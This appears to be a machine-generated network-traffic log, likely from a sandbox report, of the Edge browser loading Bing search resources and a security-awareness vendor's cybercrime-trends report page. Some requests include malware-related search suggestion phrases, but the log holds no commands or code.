GET https://r.bing.com/rs/7b/ku/jnc,nj/cNbseG2vlUH2ubvgjbDJtgTzQPo.js?or=wHTTP Request
GET https://r.bing.com/rp/fRSNKQanUHk53F1a1Bi8UA71Qt4.br.jsHTTP Request
GET https://r.bing.com/rp/54AhoVrJ5wIiJSQo1829bjCTaDo.br.jsHTTP Request
GET https://r.bing.com/rp/6mZmj1db42G_jniFgdT7MCvBgyA.br.jsHTTP Request
GET https://r.bing.com/rp/JigriHckblqcu1XwKpT4wumVS2k.br.jsHTTP Request
GET https://r.bing.com/rp/UftfQbYuKvGGEUHPU3QGHYd90Z8.br.jsHTTP Request
GET https://r.bing.com/rp/06bQtOdvnqIODKnOBKJedLV7FUg.br.jsHTTP Request
GET https://r.bing.com/rp/zlfm-hC70pZAs62UVTTl3KShKOE.br.jsHTTP Request
GET https://r.bing.com/rp/HbkPYqcLh_xqZSd1KqLTrWN8MYY.br.jsHTTP Request
GET https://r.bing.com/rp/hkXWsTcGTHs44QxzZyThd4fbbPM.br.jsHTTP Request
GET https://r.bing.com/rp/EcPZJcvBpS1TWE_YYG-PcTqlkRQ.br.jsHTTP Request
GET https://r.bing.com/rp/5FbVcVko_TuW5Y8VB4_bHoFuDm8.br.jsHTTP Request
GET https://r.bing.com/rp/VPMQzQB3PxOxIi0snQNYfwjTWzo.br.jsHTTP Request
GET https://r.bing.com/rp/EmbwE8rah_7zdUQkosWSw-5nAPY.br.jsHTTP Request
GET https://r.bing.com/rp/E9t3sAO3lNcvcdO-T16IoSdcs94.br.jsHTTP Request
GET https://r.bing.com/rp/44Hadr7BiNLQdKT4SHan0JHPRgc.br.jsHTTP Request
GET https://r.bing.com/rp/yOU5_vGeE7HIs09fec6ZV9prLO4.br.jsHTTP Request
GET https://r.bing.com/rp/bv1BjsnUXnMc-Ei3W1LPthJOdzs.br.jsHTTP Request
GET https://r.bing.com/rp/bll21ZO27j3KPE27uQBxt24c2Fw.br.jsHTTP Request
GET https://r.bing.com/rp/t6Tz4UURXPD2SmtEEPGLoJpq69g.br.jsHTTP Request
GET https://r.bing.com/rp/AvKJcbJ1EyHCCRmf5jCFG0kHVf8.br.jsHTTP Request
GET https://r.bing.com/rp/ClBB7fdm5DZrrkATnoyfumVXhIs.br.jsHTTP Request
GET https://r.bing.com/rp/zZmQ2qIQ97HIFQdce5cTrdiR1Jw.br.jsHTTP Request
GET https://r.bing.com/rp/AjU6jiWg-x6pnWzdPdiFX5Frlfk.br.jsHTTP Request
GET https://r.bing.com/rp/2DyrZWV35Nk6it3meHG_C7ZjJ8M.br.jsHTTP Request
GET https://r.bing.com/rp/wkWt7BtQdqUJkCPKQdJdk548UFA.br.jsHTTP Request
GET https://r.bing.com/rp/Jnh8f1BaqA6QhGEDPml3FtXpFbY.br.jsHTTP Request
GET https://r.bing.com/rp/nc60aT-MXWFDGmlflZLjNBVVxkM.br.jsHTTP Request
GET https://r.bing.com/rp/CcMXS8Oo0OUnUE0LzYK9AFJ6la8.br.jsHTTP Request
GET https://r.bing.com/rp/HqDsKR6xyRoUSYXXRfEdLVt772I.br.jsHTTP Request
GET https://r.bing.com/rp/t5vZ9VqTO-Sl4hN969ySbvZgV0g.br.jsHTTP Request
GET https://r.bing.com/rp/RvRBoZ5KQDNHwbHfo-_ZBZIoYQo.br.jsHTTP Request
GET https://r.bing.com/rp/5f8STjRzdjQ-8jgF3Ho7ptcTR94.br.jsHTTP Request
GET https://r.bing.com/rp/2pI-3yxS71qnL6vzhVIltDQouTg.br.jsHTTP Request
GET https://r.bing.com/rp/wNhUjm3kl_kvyfrio44J6j1zdYo.br.jsHTTP Request
GET https://r.bing.com/rp/9tfFg6vO9uS7FxceSoXBYqA1DZY.br.jsHTTP Request
GET https://r.bing.com/rp/45oaVkgLq8mr5mvzpRSIJZ8SBLk.br.jsHTTP Request
GET https://r.bing.com/rp/Y_vP5bket1OE26V4d4L4FHDnP4w.br.jsHTTP Request
GET https://r.bing.com/rp/hulMy94NWe4P3UsIN3zt_iGS9n8.br.jsHTTP Request
GET https://r.bing.com/rp/lDSK5WXW01RCyGzCzzxdJDFYfO0.br.jsHTTP Request
GET https://r.bing.com/rp/gGRPwribt8XPTQXpd2zkMD5o04w.br.jsHTTP Request
GET https://r.bing.com/rp/b1tGfF7YW1vyypumVmyY7dmizYA.br.jsHTTP Request
GET https://r.bing.com/rp/X9zPQVZQzKFTYze2B2WNn1LJCS4.br.jsHTTP Request
GET https://r.bing.com/rp/XvPs3zdtm8Xfl-ujR40Xu7FW0LI.br.jsHTTP Request
GET https://r.bing.com/rp/QGgDCAP4Fmzft4oE0wUK8k18tLI.br.jsHTTP Request
GET https://r.bing.com/rp/BDwYWcRQC1NNdqbnczZFTEPNiGk.br.jsHTTP Request
GET https://r.bing.com/rp/8aj_I6fSAQ2HauP0CPPAfDwa2j8.br.jsHTTP Request
GET https://r.bing.com/rp/LTCT2zdUcB3ayDDUpC7BI5zxXuE.br.jsHTTP Request
GET https://r.bing.com/rs/7b/t5/jnc,nj/2RFgnacsz6nPw9vvxd8AGFyaQr8.js?or=wHTTP Request
GET https://r.bing.com/rp/HdiojNH85n4iu87NAQvDH5bKMnM.br.jsHTTP Request
GET https://r.bing.com/rp/ciI4DrhPUNmhXgxM4MW52bFXjfw.br.jsHTTP Request
GET https://r.bing.com/rp/ukaQhuYQyTz3agbHIeyBRoBxhmE.br.jsHTTP Request
GET https://r.bing.com/rp/WPedHfV8dQrn4qkif5azDZSqmn8.br.jsHTTP Request
GET https://r.bing.com/rp/0UgTj-oiRnDKC7d-RWXdk9x4j00.br.jsHTTP Request
GET https://r.bing.com/rp/pYx84E5QxKsDa_GCjDkQj38YO0k.br.jsHTTP Request
GET https://r.bing.com/rp/kNUdPzzLEbQzYr3icm3MTxwk6-Y.br.jsHTTP Request
GET https://r.bing.com/rp/y9cMttd-SwSaYuiqhqk701fxHs0.br.jsHTTP Request
GET https://r.bing.com/rp/5F86_iDyVt4Fjf1Blaqa2W_2tsA.br.jsHTTP Request
GET https://r.bing.com/rp/MCwdqGFTwqu20jt3177s57V4wZk.br.jsHTTP Request
GET https://r.bing.com/rp/e5E3S-lkItFHIqVf6KjzTWPZb6Y.br.jsHTTP Request
GET https://r.bing.com/rp/q3vkafrVjv12grVkPQlJmLegna0.br.jsHTTP Request
GET https://r.bing.com/rp/4CqZEDbQQNo8pxNGAY-pz2gS6TM.br.jsHTTP Request
GET https://r.bing.com/rp/BnykzSrhLLq7vL0UKHbUNqrGDVk.br.jsHTTP Request
GET https://r.bing.com/rp/oGyDh-oDLn6IkPalHPWMedvSDQA.br.jsHTTP Request
GET https://r.bing.com/rp/mbuFLljzSy6Z7Kc_zphPXIgvoh0.br.jsHTTP Request
GET https://r.bing.com/rp/VUEGpxZelMIx8NNutjmSt3-y1iY.br.jsHTTP Request
GET https://r.bing.com/rp/CuoJ-XSESmq5e-S0atX4JdNgEbQ.br.jsHTTP Request
GET https://r.bing.com/rp/IZJX7X52Yk3KGeZJqEoHg_kDPy0.br.jsHTTP Request
GET https://r.bing.com/rp/W6JA1dqYURoDF58Us-rKOCztnvE.br.jsHTTP Response
200HTTP Request
GET https://r.bing.com/rp/oumz7WWsPEpvI2GvDjnAYme8IVY.br.jsHTTP Response
200HTTP Response
200HTTP Request
GET https://r.bing.com/rp/mSXQPT7e1TlMt8h0fagSrjh90gY.br.jsHTTP Request
GET https://r.bing.com/rp/1Fv2ZQvZTbMVx7KoU_6WkFwvTJ4.br.jsHTTP Response
200HTTP Request
GET https://r.bing.com/rp/y1tiMssL1_ZRGIkBjxDYmR2kX8o.br.jsHTTP Response
200HTTP Response
200HTTP Request
GET https://r.bing.com/rp/8w26ODmd1hk4C30WJtfkdBYFSfE.br.jsHTTP Response
200HTTP Response
200HTTP Response
200HTTP Request
GET https://r.bing.com/rp/VJnSxYcv7TZB-im7xvuwo7wcIGs.br.jsHTTP Request
GET https://r.bing.com/rp/PrQ373ob8GVFmIUI5rk5UyOqdPQ.br.jsHTTP Request
GET https://r.bing.com/rp/IEsUJAq41KbrXKW7f2nmdJPCUXs.br.jsHTTP Response
200HTTP Response
200HTTP Request
GET https://r.bing.com/rp/Xs0bcRwli50H_9_TOsfurmNnZ64.br.jsHTTP Request
GET https://r.bing.com/rp/J8voVglUisJUijfuGyqMw30mmuM.br.jsHTTP Response
200HTTP Request
GET https://r.bing.com/rp/uiannz55FdT0j3p9jGwegfI5aIY.br.jsHTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Request
GET https://r.bing.com/rp/eKvcHdnNwo1WcxoSioV4ztnfZk8.br.jsHTTP Request
GET https://r.bing.com/rp/SDeE6NKJQCkfNK6cB0GHg-KiEns.br.jsHTTP Request
GET https://r.bing.com/rp/ID-70CBAEOXh6Nwxga-CxgpUq4k.br.jsHTTP Request
GET https://r.bing.com/rp/ydDuUFvQrnTEDpvE14Ya7abrPGk.br.jsHTTP Request
GET https://r.bing.com/rp/6uiJaf2fPzSDV7i5NIaa4424Xuk.br.jsHTTP Request
GET https://r.bing.com/rp/IMqjT7QyrugA4se9um3IMRZO93c.br.jsHTTP Request
GET https://r.bing.com/rp/hx1FP91l4PKrDhCLfXHf3ouMwSg.br.jsHTTP Request
GET https://r.bing.com/rp/ulJ3ckR0YcGpvIX6xhO4prJhEQQ.br.jsHTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Request
GET https://r.bing.com/rp/wrZP3EgNVYrorH3c6R47Sruy0OM.br.jsHTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Request
GET https://r.bing.com/rp/R_rYK_qaMtV4wMhK7ShAxVvSe_s.br.jsHTTP Response
200HTTP Request
GET https://r.bing.com/rp/NLI5XRtpCK_NYPks3Y5xU5ORkeQ.br.jsHTTP Response
200 -
92.123.128.169:443https://th.bing.com/th?id=OSK.31bb8bd828eb9d00ed396b13dc134c00&w=153&h=118&o=6&pid=SANGAMtls, http2msedge.exe16.8kB 264.9kB 187 235
HTTP Request
GET https://th.bing.com/th?id=ODLS.A2450BEC-5595-40BA-9F13-D9EC6AB74B9F&w=18&h=18&o=6&pid=AdsPlusHTTP Request
GET https://th.bing.com/th?id=ODLS.451432e1-0a00-4505-8e75-ca1f125a3396&w=18&h=18&o=6&pid=AdsPlusHTTP Request
GET https://th.bing.com/th?id=ODLS.05409d17-5d83-4701-acc1-90430dd3b02c&w=16&h=16&o=6&pid=1.2HTTP Request
GET https://th.bing.com/th?id=ODLS.1e0df9ff-b013-45f3-b7aa-950120bda86e&w=16&h=16&o=6&pid=1.2HTTP Request
GET https://th.bing.com/th?id=ODLS.b5fb1f64-8ad9-4d0c-991d-7ec0bd490bf8&w=16&h=16&o=6&pid=1.2HTTP Request
GET https://th.bing.com/th?id=ODLS.12ea9a8d-aac8-43e3-812a-24b84af616a9&w=16&h=16&o=6&pid=1.2HTTP Request
GET https://th.bing.com/th?id=ODLS.05409d17-5d83-4701-acc1-90430dd3b02c&w=32&h=32&qlt=90&pcl=fffffa&o=6&pid=1.2HTTP Request
GET https://th.bing.com/th?id=ODLS.2acc523d-5e45-4766-b29b-968f9adc60df&w=32&h=32&qlt=91&pcl=fffffa&o=6&pid=1.2HTTP Request
GET https://th.bing.com/th?id=OIP.NgA3ftBHZZOqthvN4Bup8wAAAA&w=80&h=80&c=1&vt=10&bgcl=0221d8&r=0&o=6&pid=5.1HTTP Request
GET https://th.bing.com/th?id=ODLS.998e508e-77a2-4745-89dd-afc5d29468e1&w=32&h=32&qlt=92&pcl=fffffa&o=6&pid=1.2HTTP Request
GET https://th.bing.com/th?id=ODLS.c7d54ab5-176a-431d-ab18-1bfc7ead56b3&w=32&h=32&qlt=93&pcl=fffffa&o=6&pid=1.2HTTP Request
GET https://th.bing.com/th?id=OVP.GVIrZLFhm9LS2w1ROl-_nQEsDh&w=197&h=110&c=7&rs=1&qlt=90&o=6&pid=1.7HTTP Request
GET https://th.bing.com/th?id=OVP.aqE4sP9v1bMdyZl8BE3tAQHgFo&w=197&h=110&c=7&rs=1&qlt=90&o=6&pid=1.7HTTP Request
GET https://th.bing.com/th?id=OVP._tuk1lfZKW8PK4aEorKd0gHgFo&w=197&h=110&c=7&rs=1&qlt=90&o=6&pid=1.7HTTP Request
GET https://th.bing.com/th?id=OVP.OcR2VM02wfaSVjaVO-cpPQHgFo&w=197&h=110&c=7&rs=1&qlt=90&o=6&pid=1.7HTTP Request
GET https://th.bing.com/th?id=OVP.M864MWS1hrNJLdtGA07_vQEsDh&w=197&h=110&c=7&rs=1&qlt=90&o=6&pid=1.7HTTP Request
GET https://th.bing.com/th?id=OVP.eq6IvB1OchM55kZ53gzG7QHgFo&w=197&h=110&c=7&rs=1&qlt=90&o=6&pid=1.7HTTP Request
GET https://th.bing.com/th?id=OVP.BR_or-utVMYjPIM7sWcTiwDKFo&w=115&h=204&c=7&rs=1&qlt=90&o=6&pid=1.7HTTP Request
GET https://th.bing.com/th?id=OVP.iLVrrwaC8todCnGnzCLPVgFRJY&w=115&h=204&c=7&rs=1&qlt=90&o=6&pid=1.7HTTP Request
GET https://th.bing.com/th?id=OVP.-hzfe8ap5gl12J7rrdqpHQEkII&w=115&h=204&c=7&rs=1&qlt=90&o=6&pid=1.7HTTP Request
GET https://th.bing.com/th?id=OVP.AbLjV8fwFxfm0bL_giDSTQDKFo&w=115&h=204&c=7&rs=1&qlt=90&o=6&pid=1.7HTTP Request
GET https://th.bing.com/th?id=OVP.J7ZZzXHMNRbmsUdbjF2AzQEkII&w=115&h=204&c=7&rs=1&qlt=90&o=6&pid=1.7HTTP Request
GET https://th.bing.com/th?q=Wanna+Cry+Download&w=120&h=50&c=7&rs=1&qlt=90&p=0&o=5&pid=1.7&mkt=en-GB&cc=GB&setlang=en&adlt=moderate&t=1HTTP Request
GET https://th.bing.com/th?q=Free+Ransomware+Removal+Tool&w=120&h=50&c=7&rs=1&qlt=90&p=0&o=5&pid=1.7&mkt=en-GB&cc=GB&setlang=en&adlt=moderate&t=1HTTP Request
GET https://th.bing.com/th?q=Jigsaw.exe+Download&w=120&h=50&c=7&rs=1&qlt=90&p=0&o=5&pid=1.7&mkt=en-GB&cc=GB&setlang=en&adlt=moderate&t=1HTTP Request
GET https://th.bing.com/th?q=Petya+Download&w=120&h=50&c=7&rs=1&qlt=90&p=0&o=5&pid=1.7&mkt=en-GB&cc=GB&setlang=en&adlt=moderate&t=1HTTP Request
GET https://th.bing.com/th?q=Virus+Download+Link&w=120&h=50&c=7&rs=1&qlt=90&p=0&o=5&pid=1.7&mkt=en-GB&cc=GB&setlang=en&adlt=moderate&t=1HTTP Request
GET https://th.bing.com/th?id=ODLS.be5017b0-b045-4a18-bcc7-e982036597e0&w=32&h=32&qlt=94&pcl=fffffa&o=6&pid=1.2HTTP Request
GET https://th.bing.com/th?id=ODLS.998e508e-77a2-4745-89dd-afc5d29468e1&w=32&h=32&qlt=95&pcl=fffffa&o=6&pid=1.2HTTP Request
GET https://th.bing.com/th?id=ODLS.2acc523d-5e45-4766-b29b-968f9adc60df&w=16&h=16&c=7&o=6&pid=1.7HTTP Request
GET https://th.bing.com/th?id=ODLS.c7d54ab5-176a-431d-ab18-1bfc7ead56b3&w=16&h=16&c=7&o=6&pid=1.7HTTP Request
GET https://th.bing.com/th?id=ODLS.A2450BEC-5595-40BA-9F13-D9EC6AB74B9F&w=16&h=16&c=7&o=6&pid=1.7HTTP Request
GET https://th.bing.com/th?id=ODLS.8e7e59ef-b994-4f32-aa65-a853f1a07e79&w=18&h=18&o=6&pid=AdsPlusHTTP Request
GET https://th.bing.com/th?id=ODLS.2eb3a562-e68d-4b64-8755-6c06140f4654&w=18&h=18&o=6&pid=AdsPlusHTTP Request
GET https://th.bing.com/th?id=ODLS.09fb117b-0983-425f-90e9-6b4651f9273c&w=20&h=20&o=6&pid=SANGAMHTTP Request
GET https://th.bing.com/th?id=ODLS.10d2eace-0368-4f5e-b697-8a38196d7f38&w=20&h=20&o=6&pid=SANGAMHTTP Request
GET https://th.bing.com/th?id=OSK.afde16707eea1f9685bc3189e85ce9f7&w=80&h=80&c=7&o=6&pid=SANGAMHTTP Request
GET https://th.bing.com/th?id=OSK.497dc2afcba293e8d41462e529a6f0ac&w=80&h=80&c=7&o=6&pid=SANGAMHTTP Request
GET https://th.bing.com/th?id=OSK.f26bf61d4e3becf4df6936414f0865ab&w=80&h=80&c=7&o=6&pid=SANGAMHTTP Request
GET https://th.bing.com/th?id=OSK.e916af50a9b5938ce7a6c9a7a2e08c7b&w=80&h=80&c=7&o=6&pid=SANGAMHTTP Request
GET https://th.bing.com/th?id=OSK.a55d2147e4ec2a0fa38a3889b62b2ebc&w=80&h=80&c=7&o=6&pid=SANGAMHTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Request
GET https://th.bing.com/th?id=OVP.lm0KeWTIbgyhTNxvz885MAHgFo&w=608&h=342&c=7&rs=1&qlt=90&o=6&pid=1.7HTTP Request
GET https://th.bing.com/th?id=OVP.pCT8UivH9jg8Re51sSFbeAHgFo&w=197&h=110&c=7&rs=1&qlt=90&o=6&pid=1.7HTTP Request
GET https://th.bing.com/th?id=OVP.OoHjttYXXGZAiQ_NMG-akgEsDh&w=197&h=110&c=7&rs=1&qlt=90&o=6&pid=1.7HTTP Request
GET https://th.bing.com/th?id=OVP.J3_WECcOQmcITdW70uwPCAEsDh&w=197&h=110&c=7&rs=1&qlt=90&o=6&pid=1.7HTTP Request
GET https://th.bing.com/th?id=OSK.HEROO9QW1akP0oES5Qqz7E9b5CmeL_aBb1vIneZrxOMEG7I&w=472&h=280&c=1&rs=2&o=6&pid=SANGAMHTTP Request
GET https://th.bing.com/th?id=OSK.HIKUUFKV3JJCxBBCAady78TVfmIYl7pzBYceieaNmwIDIgk&w=90&h=90&c=7&o=6&pid=SANGAMHTTP Request
GET https://th.bing.com/th?id=OSK.31bb8bd828eb9d00ed396b13dc134c00&w=188&h=144&o=6&pid=SANGAMHTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Request
GET https://th.bing.com/th?id=OSK.HEROO9QW1akP0oES5Qqz7E9b5CmeL_aBb1vIneZrxOMEG7I&w=384&h=228&c=1&rs=2&o=6&pid=SANGAMHTTP Request
GET https://th.bing.com/th?id=OSK.31bb8bd828eb9d00ed396b13dc134c00&w=153&h=118&o=6&pid=SANGAMHTTP Response
200HTTP Response
200 -
1.1kB 5.2kB 10 12
-
20.190.181.2:443https://login.microsoftonline.com/common/oauth2/authorize?client_id=9ea1ad79-fdb6-4f9a-8bc3-2b70f96e34c7&response_type=id_token+code&nonce=65b993d7-0600-4ced-b315-90c9b04c45c1&redirect_uri=https%3a%2f%2fwww.bing.com%2forgid%2fidtoken%2fconditional&scope=openid%20email%20profile%209ea1ad79-fdb6-4f9a-8bc3-2b70f96e34c7/.default&response_mode=form_post&instance_aware=true&msafed=0&prompt=none&state=%7b%22ig%22%3a%2292027AEB1C3C42769F3D4EA5938FBAC6%22%7dtls, http2msedge.exe3.6kB 8.4kB 19 18
HTTP Request
GET https://login.microsoftonline.com/common/oauth2/authorize?client_id=9ea1ad79-fdb6-4f9a-8bc3-2b70f96e34c7&response_type=id_token+code&nonce=65b993d7-0600-4ced-b315-90c9b04c45c1&redirect_uri=https%3a%2f%2fwww.bing.com%2forgid%2fidtoken%2fconditional&scope=openid%20email%20profile%209ea1ad79-fdb6-4f9a-8bc3-2b70f96e34c7/.default&response_mode=form_post&instance_aware=true&msafed=0&prompt=none&state=%7b%22ig%22%3a%2292027AEB1C3C42769F3D4EA5938FBAC6%22%7dHTTP Response
200HTTP Request
GET https://login.microsoftonline.com/common/oauth2/authorize?client_id=9ea1ad79-fdb6-4f9a-8bc3-2b70f96e34c7&response_type=id_token+code&nonce=65b993d7-0600-4ced-b315-90c9b04c45c1&redirect_uri=https%3a%2f%2fwww.bing.com%2forgid%2fidtoken%2fconditional&scope=openid%20email%20profile%209ea1ad79-fdb6-4f9a-8bc3-2b70f96e34c7/.default&response_mode=form_post&instance_aware=true&msafed=0&prompt=none&state=%7b%22ig%22%3a%2292027AEB1C3C42769F3D4EA5938FBAC6%22%7dHTTP Response
200 -
13.107.5.80:443https://services.bingapis.com/suggestionchips/api/v1/cannedChipstls, http2msedge.exe2.6kB 9.6kB 17 23
HTTP Request
OPTIONS https://services.bingapis.com/suggestionchips/api/v1/cannedChipsHTTP Response
204HTTP Request
POST https://services.bingapis.com/suggestionchips/api/v1/cannedChipsHTTP Response
200 -
46 B 1
-
162.159.135.42:443https://sosafe-awareness.com/sosafe-files/uploads/2023/12/cropped-favicon-32x32.pngtls, http2msedge.exe35.1kB 1.0MB 604 869
HTTP Request
GET https://sosafe-awareness.com/resources/reports/cybercrime-trends/?utm_term=Cyber%20threat&utm_campaign=UKI_EN_Non-branded_Q12023&utm_source=bing&utm_medium=paid&hsa_acc=2315609737&hsa_cam=19566844529&hsa_grp=1170981718251103&hsa_ad=&hsa_src=o&hsa_tgt=kwd-73187050925940:loc-188&hsa_kw=Cyber%20threat&hsa_mt=p&hsa_net=adwords&hsa_ver=3&msclkid=0be5aded059518b58e19c80da6f10d66&utm_content=Cyber%20threatsHTTP Response
200HTTP Request
GET https://sosafe-awareness.com/sosafe-files/themes/sosafe/css/style.css?ver=1.5.95HTTP Request
GET https://sosafe-awareness.com/wp-includes/js/jquery/jquery.min.js?ver=1.5.95HTTP Request
GET https://sosafe-awareness.com/sosafe-files/themes/sosafe/css/aos.cssHTTP Response
200HTTP Response
200HTTP Response
200HTTP Request
GET https://sosafe-awareness.com/sosafe-files/themes/sosafe/css/parts/events.css?ver=1.5.95HTTP Request
GET https://sosafe-awareness.com/sosafe-files/themes/sosafe/css/parts/resources.css?ver=1.5.95HTTP Request
GET https://sosafe-awareness.com/sosafe-files/themes/sosafe/css/blocks/data-cards.css?ver=1.5.95HTTP Request
GET https://sosafe-awareness.com/sosafe-files/themes/sosafe/css/blocks/ipad-content.css?ver=1.5.95HTTP Request
GET https://sosafe-awareness.com/sosafe-files/themes/sosafe/css/blocks/interviews-grid.css?ver=1.5.95HTTP Request
GET https://sosafe-awareness.com/sosafe-files/themes/sosafe/css/blocks/form-revamped.css?ver=1.5.95HTTP Request
GET https://sosafe-awareness.com/sosafe-files/uploads/2024/02/CCT24_Website_Header_Image_light.pngHTTP Request
GET https://sosafe-awareness.com/sosafe-files/uploads/2024/02/CCT24_Website_Header_BG_light-scaled.jpgHTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Request
GET https://sosafe-awareness.com/sosafe-files/themes/sosafe/scss/fonts/manrope-700.woff2HTTP Request
GET https://sosafe-awareness.com/sosafe-files/themes/sosafe/scss/fonts/manrope-600.woff2HTTP Request
GET https://sosafe-awareness.com/sosafe-files/themes/sosafe/scss/fonts/manrope-400.woff2HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Request
GET https://sosafe-awareness.com/sosafe-files/themes/sosafe/js/navigation.js?ver=1.5.95HTTP Request
GET https://sosafe-awareness.com/sosafe-files/themes/sosafe/js/aos.js?ver=1.5.95HTTP Request
GET https://sosafe-awareness.com/sosafe-files/themes/sosafe/js/main.js?ver=1.5.95HTTP Request
GET https://sosafe-awareness.com/sosafe-files/themes/sosafe/js/forms.js?ver=1.5.95HTTP Request
GET https://sosafe-awareness.com/sosafe-files/uploads/2024/02/CCT24_visual_Trend1-AIs-role-cyberattacks.pngHTTP Request
GET https://sosafe-awareness.com/sosafe-files/uploads/2024/02/CCT24_visual_Trend2-new-technologies.pngHTTP Request
GET https://sosafe-awareness.com/sosafe-files/uploads/2024/02/CCT24_visual_Trend3-cybercrime-as-a-service.pngHTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Request
GET https://sosafe-awareness.com/sosafe-files/uploads/2024/02/CCT24_visual_Trend4-hybrid-warfare.pngHTTP Request
GET https://sosafe-awareness.com/sosafe-files/uploads/2024/02/CCT24_visual_Trend5-disinformation.pngHTTP Request
GET https://sosafe-awareness.com/sosafe-files/uploads/2024/02/CCT24_visual_Trend6-health-sector.pngHTTP Response
200HTTP Response
200HTTP Response
200HTTP Request
GET https://sosafe-awareness.com/sosafe-files/themes/sosafe/img/icon-arrow-right-green.svgHTTP Response
200HTTP Request
GET https://sosafe-awareness.com/sosafe-files/uploads/2023/12/cropped-favicon-32x32.pngHTTP Response
200 -
943 B 4.6kB 8 7
-
8.0kB 167.7kB 138 139
HTTP Request
GET https://js.hsforms.net/forms/embed/v2.jsHTTP Response
200 -
13.225.239.115:443https://cdn.matomo.cloud/sosafeawareness.matomo.cloud/matomo.jstls, http2msedge.exe4.0kB 69.9kB 58 65
HTTP Request
GET https://cdn.matomo.cloud/sosafeawareness.matomo.cloud/matomo.jsHTTP Response
200 -
23.48.165.141:443https://consent.cookiebot.com/9342a10a-36bc-4a36-99a3-f105675e7f78/cc.js?renew=false&referer=sosafe-awareness.com&dnt=true&init=falsetls, http2msedge.exe3.0kB 41.5kB 34 47
HTTP Request
GET https://consent.cookiebot.com/uc.jsHTTP Response
200HTTP Request
GET https://consent.cookiebot.com/9342a10a-36bc-4a36-99a3-f105675e7f78/cc.js?renew=false&referer=sosafe-awareness.com&dnt=true&init=falseHTTP Response
200 -
104.18.160.125:443https://forms.hsforms.com/embed/v3/form/8858700/3e5bc83a-1db9-4cbc-a714-816d21b3786f/json?hs_static_app=forms-embed&hs_static_app_version=1.4774&X-HubSpot-Static-App-Info=forms-embed-1.4774tls, httpmsedge.exe2.7kB 11.0kB 21 25
HTTP Request
GET https://forms.hsforms.com/embed/v3/form/8858700/3e5bc83a-1db9-4cbc-a714-816d21b3786f/json?hs_static_app=forms-embed&hs_static_app_version=1.4774&X-HubSpot-Static-App-Info=forms-embed-1.4774HTTP Response
200 -
1.5kB 2.5kB 9 6
-
18.195.235.189:443https://sosafeawareness.matomo.cloud/matomo.php?fa_vid=nZCiYW&fa_id=hsForm_3e5bc83a-1db9-4cbc-a714-816d21b3786f&fa_fv=1&ca=1&idsite=4&rec=1&r=608603&h=15&m=32&s=27&url=https%3A%2F%2Fsosafe-awareness.com%2Fresources%2Freports%2Fcybercrime-trends%2F%3Futm_term%3DCyber%20threat%26utm_campaign%3DUKI_EN_Non-branded_Q12023%26utm_source%3Dbing%26utm_medium%3Dpaid%26hsa_acc%3D2315609737%26hsa_cam%3D19566844529%26hsa_grp%3D1170981718251103%26hsa_ad%3D%26hsa_src%3Do%26hsa_tgt%3Dkwd-73187050925940%3Aloc-188%26hsa_kw%3DCyber%20threat%26hsa_mt%3Dp%26hsa_net%3Dadwords%26hsa_ver%3D3%26msclkid%3D0be5aded059518b58e19c80da6f10d66%26utm_content%3DCyber%20threats&urlref=https%3A%2F%2Fwww.bing.com%2F&_id=5386e3a2dcbb0558&_idn=0&send_image=0&_rcn=UKI_EN_Non-branded_Q12023&_rck=Cyber%20threat&_refts=1709220746&_ref=https%3A%2F%2Fwww.bing.com%2F&pv_id=86Faos&uadata=%7B%22model%22%3A%22%22%2C%22platform%22%3A%22Windows%22%2C%22platformVersion%22%3A%2210.0%22%2C%22uaFullVersion%22%3A%2292.0.902.67%22%7D&pdf=1&qt=0&realp=0&wma=0&fla=0&java=0&ag=0&cookie=1&res=1280x720tls, http2msedge.exe9.0kB 10.0kB 35 40
HTTP Request
